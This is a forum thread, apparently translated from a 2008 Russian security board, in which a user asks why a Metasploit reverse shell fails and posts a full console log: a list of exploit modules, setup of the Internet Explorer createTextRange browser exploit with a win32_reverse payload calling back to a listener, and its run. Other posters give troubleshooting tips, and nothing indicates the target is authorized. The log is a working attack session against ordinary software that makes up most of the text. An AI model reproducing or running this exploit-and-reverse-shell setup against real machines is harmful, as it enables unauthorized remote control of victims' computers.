Metaexploit

Discussion in 'Security and Anonymity' started by wofan, 15 Nov 2008.

  1. wofan

    wofan Elder

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Help, the reverse shell isn't working for me in Metaexploit. Can you tell me how to fix this? ***
     
  2. D1mka

    D1mka Elder

    Joined:
    2 Jan 2008
    Messages:
    123
    Likes Received:
    14
    Reputations:
    2
    Read lebed's articles carefully: http://forum.antichat.ru/thread21599.html
     
  3. wofan

    I've already read it. The computer won't connect for me?
     
  4. 0verbreaK

    0verbreaK Elder

    Joined:
    30 Apr 2008
    Messages:
    318
    Likes Received:
    42
    Reputations:
    -3
    Which Metasploit version?
     
  5. wofan

    The Metasploit version is 2.7
     
  6. 0verbreaK

    Try a newer one, or else the previous one
     
  7. wofan

    Isn't there an alternative solution?
     
  8. -=lebed=-

    -=lebed=- hash cracker

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    It would be better if you posted the console log (the full one)
     
  9. wofan

    Here is the log
    _____________________________________
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================

    3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
    Credits Metasploit Framework Credits
    afp_loginext AppleFileServer LoginExt PathName Overflow
    aim_goaway AOL Instant Messenger goaway Overflow
    altn_webadmin Alt-N WebAdmin USER Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    arkeia_agent_access Arkeia Backup Client Remote Access
    arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
    arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
    awstats_configdir_exec AWStats configdir Remote Command Execution
    backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
    backupexec_dump Veritas Backup Exec Windows Remote File Access
    backupexec_ns Veritas Backup Exec Name Service Overflow
    backupexec_registry Veritas Backup Exec Server Registry Access
    badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
    bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
    barracuda_img_exec Barracuda IMG.PL Remote Command Execution
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow
    bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow
    cabrightstor_disco CA BrightStor Discovery Service Overflow
    cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
    cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
    cabrightstor_uniagent CA BrightStor Universal Agent Overflow
    cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
    cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
    calicclnt_getconfig CA License Client GETCONFIG Overflow
    calicserv_getconfig CA License Server GETCONFIG Overflow
    cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
    edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow
    eiq_license EIQ License Manager Overflow
    eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)
    firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)
    freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow
    freeftpd_user freeFTPd USER Overflow
    freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
    futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
    globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
    gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
    google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
    hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
    hpux_lpd_exec HP-UX LPD Command Execution
    ia_webmail IA WebMail 3.x Buffer Overflow
    icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
    ie_createobject Internet Explorer COM CreateObject Code Execution
    ie_createtextrange Internet Explorer createTextRange() Code Execution
    ie_iscomponentinstalled Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow
    ie_objecttype Internet Explorer Object Type Overflow
    ie_vml_rectfill Internet Explorer VML Fill Method Code Execution
    ie_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Code Execution
    ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
    iis40_htr IIS 4.0 .HTR Buffer Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
    iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
    iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
    iis_source_dumper IIS Web Application Source Code Disclosure
    iis_w3who_overflow IIS w3who.dll ISAPI Overflow
    imail_imap_delete IMail IMAP4D Delete Overflow
    imail_ldap IMail LDAP Service Buffer Overflow
    irix_lpsched_exec IRIX lpsched Command Execution
    kerio_auth Kerio Personal Firewall 2 (2.1.4) Remote Auth Packet Overflow
    lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
    lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL)
    mailenable_auth_header MailEnable Authorization Header Buffer Overflow
    mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
    mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow
    maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
    mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtPilot Source Overflow
    mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
    mercantec_softcart Mercantec SoftCart CGI Overflow
    mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
    mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow
    minishare_get_overflow Minishare 1.4.1 Buffer Overflow
    mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
    ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow
    ms05_039_pnp Microsoft PnP MS05-039 Overflow
    msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
    msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
    msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
    mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
    mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
    netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow
    netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
    niprint_lpd NIPrint LPD Request Overflow
    novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
    openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
    openview_omniback HP OpenView Omniback II Command Execution
    oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
    oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
    oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
    pajax_remote_exec PAJAX Remote Command Execution
    payload_handler Metasploit Framework Payload Handler
    peercast_url_linux PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux)
    peercast_url_win32 PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)
    php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
    php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
    php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
    phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
    phpnuke_search_module PHPNuke Search Module SQL Injection Vulnerability
    poptop_negative_read Poptop Negative Read Overflow
    privatewire_gateway_win32 Private Wire Gateway Buffer Overflow (win32)
    putty_ssh PuTTy.exe <= v0.53 Buffer Overflow
    realserver_describe_linux RealServer Describe Buffer Overflow
    realvnc_41_bypass RealVNC 4.1 Authentication Bypass
    realvnc_client RealVNC 3.3.7 Client Buffer Overflow
    rras_ms06_025 Microsoft RRAS MSO6-025 Stack Overflow
    rras_ms06_025_rasman Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow
    rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow
    safari_safefiles_exec Safari Archive Metadata Command Execution
    samba_nttrans Samba Fragment Reassembly Overflow
    samba_trans2open Samba trans2open Overflow
    samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
    samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
    sambar6_search_results Sambar 6 Search Results Buffer Overflow
    seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
    securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
    sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
    servu_mdtm_overflow Serv-U FTPD MDTM Overflow
    shixxnote_font ShixxNOTE 6.net Font Buffer Overflow
    shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow

    slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
    smb_sniffer SMB Password Capture Service
    solaris_dtspcd_noir Solaris dtspcd Heap Overflow
    solaris_kcms_readfile Solaris KCMS Arbitary File Read
    solaris_lpd_exec Solaris LPD Command Execution
    solaris_lpd_unlink Solaris LPD Arbitrary File Delete
    solaris_sadmind_exec Solaris sadmind Command Execution
    solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
    solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
    sphpblog_file_upload Simple PHP Blog remote command execution
    squid_ntlm_authenticate Squid NTLM Authenticate Overflow
    svnserve_date Subversion Date Svnserve
    sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow
    sygate_policy_manager Sygate Management Server SQL Injection
    tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow
    trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
    ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow
    uow_imap4_copy University of Washington IMAP4 COPY Overflow
    uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
    ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
    ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
    warftpd_165_pass War-FTPD 1.65 PASS Overflow
    warftpd_165_user War-FTPD 1.65 USER Overflow
    webstar_ftp_user WebSTAR FTP Server USER Overflow
    winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow
    windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
    wins_ms04_045 Microsoft WINS MS04-045 Code Execution
    wmailserver_smtp SoftiaCom WMailserver 1.0 SMTP Buffer Overflow
    wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
    wzdftpd_site Wzdftpd SITE Command Arbitrary Command Execution
    ypops_smtp YahooPOPS! <= 0.6 SMTP Buffer Overflow
    zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow

    msf > use ie_createtextrange
    msf ie_createtextrange > show payloads

    Metasploit Framework Usable Payloads
    ====================================

    win32_downloadexec Windows Executable Download and Execute
    win32_exec Windows Execute Command
    win32_passivex Windows PassiveX ActiveX Injection Payload
    win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
    win32_passivex_stg Windows Staged PassiveX Shell
    win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server Inject

    msf ie_createtextrange > set PALOAD win32_reverse
    PALOAD -> win32_reverse
    msf ie_createtextrange > show options

    Exploit Options
    ===============

    Exploit: Name Default Description
    -------- -------- ------- ----------------------------
    optional HTTPHOST 0.0.0.0 The local HTTP listener host
    required HTTPPORT 8080 The local HTTP listener port

    Target: Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)

    msf ie_createtextrange > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_createtextrange(win32_reverse) > show options

    Exploit and Payload Options
    ===========================

    Exploit: Name Default Description
    -------- -------- ------- ----------------------------
    optional HTTPHOST 0.0.0.0 The local HTTP listener host
    required HTTPPORT 8080 The local HTTP listener port

    Payload: Name Default Description
    -------- -------- ------- ------------------------------------------
    required EXITFUNC seh Exit technique: "process", "thread", "seh"
    required LHOST Local address to receive connection
    required LPORT 4321 Local port to receive connection

    Target: Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)

    msf ie_createtextrange(win32_reverse) > set HTTPHOST 192.168.1.51
    HTTPHOST -> 192.168.1.51
    msf ie_createtextrange(win32_reverse) > set LHOST 192.168.1.51
    LHOST -> 192.168.1.51
    msf ie_createtextrange(win32_reverse) > sel LPORT 1031
    msfconsole: sel: command not found
    msf ie_createtextrange(win32_reverse) > set LPORT 1031
    LPORT -> 1031
    msf ie_createtextrange(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://192.168.1.51:8080/
    [*] Client connected from 192.168.1.52:1061 (Windows).
    [*] Got connection from 192.168.1.51:1031 <-> 192.168.1.52:1062

    [*] Exiting Reverse Handler.
     
  10. -=lebed=-

    It's an overflow exploit, it doesn't always work; looks like it didn't get through the browser...
     
  11. wofan

    What does "didn't get through" mean?
     
  12. Pernat1y

    Pernat1y Elder

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    It means that the exploit didn't work.
    And anyway, it's called Metasploit.
     
  13. wofan

    Then why do all the other payloads work?
     
    #13 wofan, 17 Nov 2008
    Last edited: 17 Nov 2008